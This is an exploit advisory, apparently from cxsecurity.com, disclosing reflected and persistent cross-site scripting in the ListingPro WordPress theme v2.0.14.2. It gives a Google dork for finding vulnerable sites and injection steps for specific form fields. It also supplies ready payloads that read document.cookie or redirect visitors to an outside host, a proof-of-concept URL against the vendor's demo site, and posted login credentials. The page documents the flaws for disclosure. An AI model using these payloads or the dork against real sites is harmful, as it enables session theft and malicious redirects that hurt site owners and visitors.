ListingPro - WordPress Directory Theme v2.0.14.2 Reflected & Persistent XSS

2019.11.29
ru SubversA (RU) ru
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: ListingPro - WordPress Directory Theme v2.0.14.2 Reflected & Persistent XSS # Google Dork: /wp-content/themes/listingpro/ # Date: 29/11/2019 # Exploit Author: SUBVΞRSΛ # Vendor Homepage: https://listingprowp.com/beta/ # Software Link: https://themeforest.net/item/listingpro-multipurpose-directory-theme/19386460 # Version: 2.0.14.2 [ 12.563 Sales ] # Tested on: Parrot OS # CVE : - # CWE : 79 ----[]- Reflected XSS: -[]---- Use your payload inside the «What» input field on the homepage ( https://classic.listingprowp.com/ ) and then submit the form — payload will be triggered. Payload Sample #0: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//"> Payload Sample #1: "><img src=x onerror=alert(`SUBVΞRSΛ`)> PoC Link: https://classic.listingprowp.com/?select=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%60SUBV%CE%9ERS%CE%9B%60%29%3E&lp_s_loc=&lp_s_tag=&lp_s_cat=&s=home&post_type=listing ----[]- Persistent XSS: -[]---- You need a new basic user account (register your own or use mine: kadajik5554913/hYWeOJdr5Mqe), then go to the https://classic.listingprowp.com/submit-listing/ page for new listing submit. Choose the «Free» plan and press «Continue» button. On the next page you need to choose any category and after that you'll see the vulnerable input fields: «Best Day/Night» and «Good For» (for some categories you'll see only one vulnerable input field — «Good For»). Use your payload inside vulnerable input field(-s) and save your listing. Payload Sample #0: "><img src=x onerror=alert(document.cookie)> Payload Sample #1: "><img src=x onerror=window.location.replace(`http://defcon.su`)> PoC: log in as kadajik5554913/hYWeOJdr5Mqe (login/password) and go to the https://classic.listingprowp.com/?post_type=listing&p=18417 page.


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top